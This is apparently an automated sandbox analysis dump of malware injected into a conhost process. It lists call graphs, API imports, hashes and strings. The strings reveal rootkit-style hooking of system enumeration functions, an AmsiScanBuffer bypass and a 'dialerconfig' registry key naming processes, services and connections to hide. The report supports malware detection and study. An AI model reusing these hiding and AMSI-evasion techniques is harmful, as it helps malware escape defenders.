9319->9310 9320->9319 9322 2408a2a45f0 9320->9322 9323 2408a2a4630 _log10_special 9322->9323 9326 2408a2a469c _log10_special 9323->9326 9333 2408a2a48b0 9323->9333 9325 2408a2a46d9 9340 2408a2a4be0 9325->9340 9326->9325 9327 2408a2a46a9 9326->9327 
9336 2408a2a44cc 9327->9336 9330 2408a2a46d7 _log10_special 9331 2408a297d70 _log10_special 8 API calls 9330->9331 9332 2408a2a4701 9331->9332 9332->9319 9346 2408a2a48d8 9333->9346 9337 2408a2a4510 _log10_special 9336->9337 9338 2408a2a4525 9337->9338 9339 2408a2a4be0 _log10_special 11 API calls 9337->9339 9338->9330 9339->9338 9341 2408a2a4be9 9340->9341 9342 2408a2a4c00 9340->9342 9344 2408a29dadc __std_exception_copy 11 API calls 9341->9344 9345 2408a2a4bf8 9341->9345 9343 2408a29dadc __std_exception_copy 11 API calls 9342->9343 9343->9345 9344->9345 9345->9330 9347 2408a2a4917 _raise_exc _clrfp 9346->9347 9348 2408a2a4b2c RaiseException 9347->9348 9349 2408a2a48d2 9348->9349 9349->9326 8964 2408a29d558 8965 2408a29d568 8964->8965 8966 2408a29d3d0 __std_exception_copy 11 API calls 8965->8966 8967 2408a29d573 __vcrt_uninitialize_ptd 8965->8967 8966->8967 8694 2408a2a18d3 8695 2408a2a18e0 8694->8695 8696 2408a2a18f5 8695->8696 8697 2408a2a190e 8695->8697 8698 2408a29dadc __std_exception_copy 11 API calls 8696->8698 8700 2408a29e5e4 23 API calls 8697->8700 8702 2408a2a1905 8697->8702 8699 2408a2a18fa 8698->8699 8701 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8699->8701 8700->8702 8701->8702 8703 2408a2960d3 8704 2408a2960e0 8703->8704 8705 2408a2960ec GetThreadContext 8704->8705 8710 2408a29624a 8704->8710 8706 2408a296112 8705->8706 8705->8710 8706->8710 8711 2408a296139 8706->8711 8707 2408a29632e 8709 2408a29634e 8707->8709 8721 2408a294810 8707->8721 8708 2408a296271 VirtualProtect FlushInstructionCache 8708->8710 8725 2408a295220 GetCurrentProcess 8709->8725 8710->8707 8710->8708 8713 2408a2961bd 8711->8713 8715 2408a296196 SetThreadContext 8711->8715 8715->8713 8716 2408a2963a7 8719 2408a297d70 _log10_special 8 API calls 8716->8719 8717 2408a296367 ResumeThread 8718 2408a296353 8717->8718 8718->8716 8718->8717 8720 2408a2963ef 8719->8720 8723 2408a29482c 8721->8723 8722 2408a29488f 8722->8709 8723->8722 8724 2408a294842 VirtualFree 8723->8724 
8724->8723 8726 2408a29523c 8725->8726 8727 2408a295283 8726->8727 8728 2408a295252 VirtualProtect FlushInstructionCache 8726->8728 8727->8718 8728->8726 8729 2408a2a1ed0 8730 2408a29f0c0 69 API calls 8729->8730 8731 2408a2a1ed9 8730->8731 9350 2408a29b7d4 9357 2408a29b707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9350->9357 9351 2408a29b7fb 9352 2408a299a64 __CxxCallCatchBlock 9 API calls 9351->9352 9353 2408a29b800 9352->9353 9354 2408a299a64 __CxxCallCatchBlock 9 API calls 9353->9354 9355 2408a29b80b __FrameHandler3::GetHandlerSearchState 9353->9355 9354->9355 9356 2408a29a114 9 API calls Is_bad_exception_allowed 9356->9357 9357->9351 9357->9355 9357->9356 9358 2408a29a13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9357->9358 9358->9357 8968 2408a29b1a8 8969 2408a29b1d5 __except_validate_context_record 8968->8969 8970 2408a299a64 __CxxCallCatchBlock 9 API calls 8969->8970 8973 2408a29b1da 8970->8973 8971 2408a29b2c2 8976 2408a29b2e1 8971->8976 9004 2408a29a114 8971->9004 8972 2408a29b234 8974 2408a29b2af 8972->8974 8982 2408a29b288 8972->8982 8983 2408a29b256 __GetCurrentState 8972->8983 8973->8971 8973->8972 8973->8982 8997 2408a299d10 8974->8997 8981 2408a29b330 8976->8981 8976->8982 9007 2408a29a128 8976->9007 8980 2408a29b3d9 8981->8982 9010 2408a29a974 8981->9010 8983->8980 8985 2408a29b6b8 8983->8985 8986 2408a29a114 Is_bad_exception_allowed 9 API calls 8985->8986 8987 2408a29b6e7 __GetCurrentState 8986->8987 8988 2408a299a64 __CxxCallCatchBlock 9 API calls 8987->8988 8995 2408a29b704 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8988->8995 8989 2408a29b7fb 8990 2408a299a64 __CxxCallCatchBlock 9 API calls 8989->8990 8991 2408a29b800 8990->8991 8992 2408a299a64 __CxxCallCatchBlock 9 API calls 8991->8992 8993 2408a29b80b __FrameHandler3::GetHandlerSearchState 8991->8993 8992->8993 8993->8982 8994 2408a29a114 9 API calls Is_bad_exception_allowed 8994->8995 8995->8989 8995->8993 8995->8994 9067 2408a29a13c 8995->9067 
9070 2408a299d74 8997->9070 8999 2408a299d2f __FrameHandler3::GetHandlerSearchState 9074 2408a299c80 8999->9074 9002 2408a29b6b8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9003 2408a299d64 9002->9003 9003->8982 9005 2408a299a64 __CxxCallCatchBlock 9 API calls 9004->9005 9006 2408a29a11d 9005->9006 9006->8976 9008 2408a299a64 __CxxCallCatchBlock 9 API calls 9007->9008 9009 2408a29a131 9008->9009 9009->8981 9078 2408a29b844 9010->9078 9012 2408a29ae42 9013 2408a29ad93 9013->9012 9053 2408a29ad91 9013->9053 9131 2408a29ae4c 9013->9131 9014 2408a29aabb 9014->9013 9039 2408a29aaf3 9014->9039 9015 2408a299a64 __CxxCallCatchBlock 9 API calls 9019 2408a29add5 9015->9019 9017 2408a299a64 __CxxCallCatchBlock 9 API calls 9021 2408a29aa22 9017->9021 9019->9012 9022 2408a297d70 _log10_special 8 API calls 9019->9022 9020 2408a29acc4 9023 2408a29ace1 9020->9023 9026 2408a29a114 Is_bad_exception_allowed 9 API calls 9020->9026 9020->9053 9021->9019 9024 2408a299a64 __CxxCallCatchBlock 9 API calls 9021->9024 9025 2408a29ade8 9022->9025 9029 2408a29ad03 9023->9029 9023->9053 9124 2408a299ce4 9023->9124 9028 2408a29aa32 9024->9028 9025->8982 9026->9023 9030 2408a299a64 __CxxCallCatchBlock 9 API calls 9028->9030 9031 2408a29ad19 9029->9031 9029->9053 9064 2408a29ae25 9029->9064 9032 2408a29aa3b 9030->9032 9033 2408a29ad24 9031->9033 9036 2408a29a114 Is_bad_exception_allowed 9 API calls 9031->9036 9089 2408a29a154 9032->9089 9041 2408a29b8dc 9 API calls 9033->9041 9034 2408a299a64 __CxxCallCatchBlock 9 API calls 9037 2408a29ae2b 9034->9037 9036->9033 9040 2408a299a64 __CxxCallCatchBlock 9 API calls 9037->9040 9039->9020 9042 2408a29a128 9 API calls 9039->9042 9103 2408a29b068 9039->9103 9117 2408a29a8a0 9039->9117 9043 2408a29ae34 9040->9043 9044 2408a29ad3b 9041->9044 9042->9039 9046 2408a29cad8 23 API calls 9043->9046 9048 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9044->9048 9044->9053 9045 2408a299a64 __CxxCallCatchBlock 9 API calls 9047 
2408a29aa7d 9045->9047 9046->9012 9047->9014 9049 2408a299a64 __CxxCallCatchBlock 9 API calls 9047->9049 9050 2408a29ad55 9048->9050 9052 2408a29aa89 9049->9052 9128 2408a299f80 RtlUnwindEx 9050->9128 9054 2408a299a64 __CxxCallCatchBlock 9 API calls 9052->9054 9053->9015 9056 2408a29aa92 9054->9056 9092 2408a29b8dc 9056->9092 9060 2408a29aaa6 9099 2408a29b9cc 9060->9099 9062 2408a29ae1f 9063 2408a29cad8 23 API calls 9062->9063 9063->9064 9064->9034 9065 2408a29aaae __CxxCallCatchBlock std::bad_alloc::bad_alloc 9065->9062 9066 2408a2998d0 Concurrency::cancel_current_task 2 API calls 9065->9066 9066->9062 9068 2408a299a64 __CxxCallCatchBlock 9 API calls 9067->9068 9069 2408a29a14a 9068->9069 9069->8995 9071 2408a299da2 __FrameHandler3::GetHandlerSearchState 9070->9071 9072 2408a299e12 9071->9072 9073 2408a299dce RtlLookupFunctionEntry 9071->9073 9072->8999 9073->9071 9075 2408a299c9e 9074->9075 9076 2408a299ccb 9075->9076 9077 2408a299a64 __CxxCallCatchBlock 9 API calls 9075->9077 9076->9002 9077->9075 9079 2408a29b869 __FrameHandler3::GetHandlerSearchState 9078->9079 9080 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9079->9080 9081 2408a29b87e 9080->9081 9143 2408a29a4fc 9081->9143 9084 2408a29b890 __FrameHandler3::GetHandlerSearchState 9146 2408a29a534 9084->9146 9085 2408a29b8b3 9086 2408a29a4fc __GetUnwindTryBlock RtlLookupFunctionEntry 9085->9086 9087 2408a29a9d6 9086->9087 9087->9012 9087->9014 9087->9017 9090 2408a299a64 __CxxCallCatchBlock 9 API calls 9089->9090 9091 2408a29a162 9090->9091 9091->9012 9091->9045 9093 2408a29b9c3 9092->9093 9095 2408a29b907 9092->9095 9094 2408a29aaa2 9094->9014 9094->9060 9095->9094 9096 2408a29a128 9 API calls 9095->9096 9097 2408a29a114 Is_bad_exception_allowed 9 API calls 9095->9097 9098 2408a29b068 9 API calls 9095->9098 9096->9095 9097->9095 9098->9095 9101 2408a29b9e9 Is_bad_exception_allowed 9099->9101 9102 2408a29ba39 9099->9102 9100 2408a29a114 9 API calls Is_bad_exception_allowed 
9100->9101 9101->9100 9101->9102 9102->9065 9104 2408a29b095 9103->9104 9115 2408a29b124 9103->9115 9105 2408a29a114 Is_bad_exception_allowed 9 API calls 9104->9105 9106 2408a29b09e 9105->9106 9107 2408a29a114 Is_bad_exception_allowed 9 API calls 9106->9107 9108 2408a29b0b7 9106->9108 9106->9115 9107->9108 9109 2408a29b0e3 9108->9109 9110 2408a29a114 Is_bad_exception_allowed 9 API calls 9108->9110 9108->9115 9111 2408a29a128 9 API calls 9109->9111 9110->9109 9112 2408a29b0f7 9111->9112 9113 2408a29b110 9112->9113 9114 2408a29a114 Is_bad_exception_allowed 9 API calls 9112->9114 9112->9115 9116 2408a29a128 9 API calls 9113->9116 9114->9113 9115->9039 9116->9115 9118 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9117->9118 9119 2408a29a8dd 9118->9119 9120 2408a29a114 Is_bad_exception_allowed 9 API calls 9119->9120 9121 2408a29a915 9120->9121 9122 2408a299f80 9 API calls 9121->9122 9123 2408a29a959 9122->9123 9123->9039 9125 2408a299cf8 __FrameHandler3::GetHandlerSearchState 9124->9125 9126 2408a299c80 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9125->9126 9127 2408a299d02 9126->9127 9127->9029 9129 2408a297d70 _log10_special 8 API calls 9128->9129 9130 2408a29a07a 9129->9130 9130->9053 9132 2408a29ae82 9131->9132 9137 2408a29aef0 9131->9137 9133 2408a299a64 __CxxCallCatchBlock 9 API calls 9132->9133 9134 2408a29ae87 9133->9134 9135 2408a29ae96 EncodePointer 9134->9135 9142 2408a29aeec 9134->9142 9136 2408a299a64 __CxxCallCatchBlock 9 API calls 9135->9136 9138 2408a29aea6 9136->9138 9137->9053 9138->9142 9149 2408a299c2c 9138->9149 9140 2408a29a114 9 API calls Is_bad_exception_allowed 9140->9142 9141 2408a29a8a0 19 API calls 9141->9142 9142->9137 9142->9140 9142->9141 9144 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9143->9144 9145 2408a29a50f 9144->9145 9145->9084 9145->9085 9147 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9146->9147 9148 2408a29a54e 9147->9148 9148->9087 

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32 ref: 000002408A293639
• PathFindFileNameW.SHLWAPI ref: 000002408A293648
  • Part of subcall function 000002408A293C74: StrCmpNIW.SHLWAPI(?,?,?,000002408A29254B), ref: 000002408A293C8C
  • Part of subcall function 000002408A293BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293BCE
  • Part of subcall function 000002408A293BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293BFC
  • Part of subcall function 000002408A293BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C1E
  • Part of subcall function 000002408A293BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C39
  • Part of subcall function 000002408A293BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C5A
• CreateThread.KERNELBASE ref: 000002408A29368F
  • Part of subcall function 000002408A291D40: GetCurrentThread.KERNEL32 ref: 000002408A291D4B
Memory Dump Source
• Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
• Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
APIs
Memory Dump Source
• Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

APIs
  • Part of subcall function 000002408A291628: GetProcessHeap.KERNEL32 ref: 000002408A291633
  • Part of subcall function 000002408A291628: HeapAlloc.KERNEL32 ref: 000002408A291642
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2916B2
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2916DF
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2916F9
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291719
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291734
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291754
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A29176F
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A29178F
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2917AA
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2917CA
• SleepEx.KERNELBASE ref: 000002408A291AE3
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2917E5
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291805
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291820
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291840
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A29185B
  • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A29187B
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291896
  • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2918A0
Memory Dump Source
• Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
• Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
Similarity
• API ID: CloseOpen$Heap$AllocProcessSleep
• String ID:
• API String ID: 948135145-0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
• Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
• Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
• Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 13fb4ef1d9da1cd713a0941815fd9a6c8405a18c464eaece96056fddbba0f3c4
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 1A313D36314B8086DB608F2AE98479E77A4F788B54F540216EB9D43F99DF38C196CB00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: ffa174e198c7cbdde9477c3ca9fd96983d377114fcc421d62661ed797c204035
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: EB115E32710F008AEB10CF65E8883A833A4F318768F040E21EF6D42FA4DB78D1E58780
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                                  • Instruction ID: d42af565174c3eefed0d35b29dc0076035e1cb4af492d8a6cc6267ab02a203d9
                                                                  • Opcode Fuzzy Hash: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                                  • Instruction Fuzzy Hash: 3651B33270079099FB309B7BAA88A9F7FA5B744B94F184215EF5927E95DB38C491CB00
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                                  • Instruction ID: c67dd963b3d750ad12bde0fdc99c5ae1ed9655487f0c93fb355788bed241829b
                                                                  • Opcode Fuzzy Hash: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                                  • Instruction Fuzzy Hash: 05F01271B156948EDBA99F2CA94771A77E1F358384FD4811AE7C9C3B14D63C84A1CF04

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 7ca1741dd716dac20cc6041481acbb2c191fd386f35fa871a9dbe7236b02502e
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: F571E936710A2186EB60DF6BE998A9A37A4F784F88F451111DF4E57F69DF34C484CB40

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 000002408A291D4B
                                                                    • Part of subcall function 000002408A2920C4: GetModuleHandleA.KERNEL32(?,?,?,000002408A291D7D), ref: 000002408A2920DC
                                                                    • Part of subcall function 000002408A2920C4: GetProcAddress.KERNEL32(?,?,?,000002408A291D7D), ref: 000002408A2920ED
                                                                    • Part of subcall function 000002408A295F60: GetCurrentThreadId.KERNEL32 ref: 000002408A295F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 4b6949b511a17a93cf531f62de2fa13893cb13f11e601c96369a4066e8bf6214
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: B541D8B4300A1AA1FB24EB5FEAD9BD57721B710B54FC81513970903DB1AE7892CECB60

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: 7b9880a0304c11a639402dd2a4da6be2d71d15f03c511fe4b11c21f3a6ed6954
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: D7511936704B9486EB64CF6BE68C75ABBA1F788F99F044124DF4907B58DF38D0898B00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: a966c86bd3bd2c5ad5e125b4be24deb95fc7661c0ebede70505280159aed00ce
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: A181F761E016458AFB63BB6E9BCD39A27D0BB95780F444025BBC947797DB38C8C78708

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002408A29F0FC,?,?,?,?,000002408A29C3CF,?,?,?,?,?,000002408A297EE0), ref: 000002408A29D35C
                                                                    • Part of subcall function 000002408A29DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002408A29D432,?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D384
                                                                    • Part of subcall function 000002408A29DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002408A29643A), ref: 000002408A29DB8A
                                                                    • Part of subcall function 000002408A29DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002408A29643A), ref: 000002408A29DB94
